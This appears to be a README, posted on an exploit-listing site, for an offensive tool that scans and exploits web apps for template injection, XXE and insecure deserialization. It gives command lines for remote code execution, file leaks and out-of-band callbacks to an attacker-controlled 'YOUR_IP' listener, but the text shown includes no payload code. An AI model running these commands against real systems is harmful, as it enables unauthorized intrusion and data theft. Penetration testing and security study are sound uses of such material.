Share
## https://sploitus.com/exploit?id=355CD823-D880-5255-B025-F97309C13C0D
\# ðŸ›Ąïļ WebPentestKit2



\*\*Advanced Web Application Exploitation Framework\*\*  

\*\*SSTI · XXE · Deserialization\*\* — Three powerful modules, one command-line tool.  



⚠ïļ \*\*For authorized systems only.\*\* This tool is intended for educational purposes and legal penetration testing.



\---



\## 🗂ïļ Modules



| Module | Techniques | Targets |

| :--- | :--- | :--- |

| \*\*ssti\*\* | Polyglot Detection, Fingerprinting, RCE Escalation | Jinja2, Twig, Freemarker, Mako, Tornado |

| \*\*xxe\*\* | Classic, Blind/OOB, Error-based, SVG Upload, WAF Bypass | XML Parsers, SOAP, SVG-rendering endpoints |

| \*\*deser\*\* | Magic Byte Analysis, Gadget Chain Testing, OOB Callback | Java, PHP, Python (Pickle), .NET |



\---



\## 🚀 Installation



```bash

git clone https://github.com/ozancolhak/WebPentestKit2

cd WebPentestKit2

pip install -r requirements.txt

📖 Usage

🔍 SSTI Scanner \& Exploiter

\# Auto-detect template engine and run scan

python3 main.py ssti -u "http://target.com/render?name=test" -p name



\# Attempt RCE for a specific engine

python3 main.py ssti -u "http://target.com/view" -p q --engine jinja2 --exploit --cmd "id"



\# Fast detection with polyglot payload and JSON output

python3 main.py ssti -u "http://target.com/api" -p input --output report.json



Supported Engines:

jinja2 · twig · freemarker · velocity · smarty · mako · erb



📂 XXE Suite

\# Launch classic and blind XXE tests

python3 main.py xxe -u "http://target.com/xml-api" --technique all



\# Use local callback listener for Out-of-Band detection

python3 main.py xxe -u "http://target.com/upload" --listen --port 9001 --callback "http://YOUR\_IP:9001"



\# Execute XXE attack via SVG file upload

python3 main.py xxe -u "http://target.com/avatar" --file-upload --technique classic



Features:

file-leak · ssrf-via-xxe · error-based · utf-16-bypass



ðŸ§Đ Deserialization Scanner

\# Analyze endpoint for magic byte signatures

python3 main.py deser -u "http://target.com/session" --analyze



\# Test Java Gadget Chains with OOB detection

python3 main.py deser -u "http://target.com/api" --platform java --listen --port 8888



\# Scan for Python Pickle and .NET JSON.NET vulnerabilities

python3 main.py deser -u "http://target.com/data" --platform all --callback "http://YOUR\_IP:8888"



Platforms:

java · php · python · dotnet



📊 Reporting



Every module supports structured JSON output via:



\--output report.json



Example report:



{

  "metadata": {

    "tool": "WebPentestKit2",

    "version": "2.0.0",

    "total\_findings": 1

  },

  "findings": \[

    {

      "module": "SSTI",

      "severity": "CRITICAL",

      "title": "SSTI RCE — Jinja2 (rce\_v3)",

      "description": "Remote code execution confirmed via SSTI.",

      "evidence": {

        "cmd": "id",

        "pattern": "uid=0(root)"

      }

    }

  ]

}



Severity Levels:

CRITICAL → HIGH → MEDIUM → LOW → INFO



📜 License



This project is for educational and ethical security testing only.

The developer is not responsible for any misuse of this tool.